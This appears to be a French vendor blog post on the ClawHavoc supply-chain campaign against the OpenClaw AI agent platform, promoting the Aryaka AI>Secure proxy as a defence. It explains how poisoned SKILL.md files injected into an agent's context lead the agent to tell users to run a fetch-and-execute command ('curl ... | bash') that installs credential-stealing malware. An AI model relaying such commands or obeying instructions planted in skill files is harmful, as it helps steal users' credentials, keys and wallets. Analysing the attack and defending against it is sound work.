En février 2026, OpenClaw (anciennement Clawdbot et Moltbot) est une plateforme populaire pour les agents d’IA autonomes. Son architecture « souveraine », qui donne à l’IA un accès direct aux systèmes de fichiers et aux terminaux, augmente considérablement sa surface d’attaque, ce qui entraîne des risques élevés, notamment illustrés par la campagne ClawHavoc sur la chaîne d’approvisionnement, qui a exposé des milliers de déploiements à une compromission potentielle.
Cet article passe en revue les vulnérabilités d’OpenClaw et explique comment Aryaka AI>Secure fournit une solide atténuation des risques à plusieurs niveaux.
Vulnérabilités d’OpenClaw et contexte ClawHavoc
La vulnérabilité d’OpenClaw est due à trois facteurs principaux :
- Accès au niveau du système : Les agents peuvent exécuter des commandes shell et accéder à des informations d’identification.
- Ingestion non fiable : Les agents traitent le contenu de tiers, ce qui les expose à une injection rapide.
- Communication autonome : Les agents peuvent envoyer des données à l’extérieur sans supervision.
ClawHavoc est une attaque de la chaîne d’approvisionnement qui exploite cet écosystème. En février 2026, des chercheurs ont découvert qu’environ 12 % des compétences ClawHub étaient malveillantes, déguisées en outils utiles mais volant en réalité des identités numériques.
Comment fonctionne ClawHavoc : L’anatomie d’une infection
ClawHavoc est une attaque d’ingénierie sociale avec état qui exploite la façon dont OpenClaw ingère les instructions. Elle suit une chaîne d’exécution répétable et très efficace :
- Étape 1 : Le manifeste empoisonné (SKILL.md) : Les attaquants téléchargent une compétence sur ClawHub. Le fichier SKILL.md constitue le cœur de l’attaque. Il comprend une section « Prerequisites » qui indique à l’agent (et à l’utilisateur) qu’un script spécifique doit être exécuté pour « initialiser » l’outil.
- Étape 2 : Ingénierie sociale via LLM : lorsque vous demandez à votre agent d’utiliser la compétence, il lit le fichier malveillant SKILL.md dans son contexte. Le LLM génère alors une réponse qui semble utile : « Pour activer cette fonctionnalité, veuillez exécuter cette commande dans votre terminal : curl -sL https://glot.io/raw/snippet | bash. »
- Étape 3 : Livraison de la charge utile du logiciel malveillant : Si l’utilisateur exécute la commande, il télécharge une charge utile de deuxième étape, généralement Atomic Stealer (AMOS) ou un enregistreur de frappe. Ce logiciel malveillant exploite les cookies du navigateur, les trousseaux de clés et les fichiers d’environnement OpenClaw pour trouver des clés d’API et des portefeuilles cryptographiques.
Utilisation d’Aryaka AI>Secure pour arrêter ClawHavoc
En tant que proxy MITM conscient de l’IA et des paquets profonds, Aryaka AI>Secure intercepte le trafic à chaque étape de la chaîne d’attaque ClawHavoc.
Méthode 1 : Bloquer le téléchargement de compétences malveillantes
Lorsqu’un utilisateur exécute clawhub install, AI>Secure décrypte le trafic HTTPS à partir du registre.
- La protection : Il ne se contente pas de voir un fichier, il analyse le contenu Markdown du fichier SKILL.md. Il utilise l’inspection sémantique pour identifier les « instructions toxiques », telles que les commandes shell cachées ou les liens vers des sites connus de partage de snippets utilisés dans la campagne ClawHavoc.
- Résultat : Il bloque le téléchargement à la périphérie du réseau, empêchant ainsi les instructions malveillantes d’atteindre la mémoire de l’agent.
Méthode 2 : filtrage sémantique des réponses (défense des instructions)
Si une mauvaise compétence est déjà présente sur votre machine, AI>Secure fournit une deuxième couche de défense en inspectant la sortie du LLM.
- La protection : Lorsque le LLM demande à l’utilisateur d' »exécuter ce script pour activer l’outil », le moteur sémantique d’AI>Secure reconnaît qu’il s’agit d’une « fraude à l’installation ». Il identifie que l’IA est manipulée pour tromper un humain dans une action dangereuse.
- Résultat : Le proxy supprime la commande du flux de discussion ou bloque entièrement le message, en le remplaçant par un avertissement de sécurité dans l’interface de l’utilisateur.
Méthode 3 : Filtrage proactif des URL et SWG (défense contre les charges utiles)
Si l’utilisateur tente d’exécuter manuellement une commande curl malveillante ou de télécharger un ZIP « prérequis », la fonctionnalité Secure Web Gateway (SWG) d’AI>Secure intervient.
- La protection : AI>Secure utilise un flux d’intelligence URL en temps réel pour suivre les domaines d’hameçonnage et les infrastructures d’hébergement de logiciels malveillants.
- Résultat : Lorsque l’agent ou l’utilisateur tente d’atteindre l’URL spécifique hébergeant la charge utile du logiciel malveillant (comme glot.io ou webhook.site), le proxy identifie la destination comme étant « malveillante » ou « à haut risque » et tue la requête instantanément. Cela permet d’éviter que le logiciel malveillant ne soit récupéré.
Méthode 4 : Outil d’exécution et verrouillage des données
Si le logiciel malveillant parvient à s’exécuter, AI>Secure joue le rôle de gardien final de vos données.
- La protection : Il comprend les appels MCP (Model Context Protocol). Si un agent infecté tente d’exécuter une commande shell pour exfiltrer des données, AI>Secure identifie la destination anormale.
- Résultat : Son système DLP (Data Loss Prevention) de nouvelle génération analyse toutes les données sortantes à la recherche de « secrets » (clés API, en-têtes SSH). S’il constate que vos informations d’identification privées quittent le réseau, il met fin à la session et alerte l’équipe de sécurité.
Conclusion
La crise ClawHavoc prouve que pour les agents autonomes, le prompt et le manifeste de compétences sont les nouveaux périmètres. En utilisant un proxy centré sur l’IA comme Aryaka AI>Secure, vous vous assurez que votre agent OpenClaw reste un outil de productivité plutôt qu’une porte d’entrée pour les attaquants.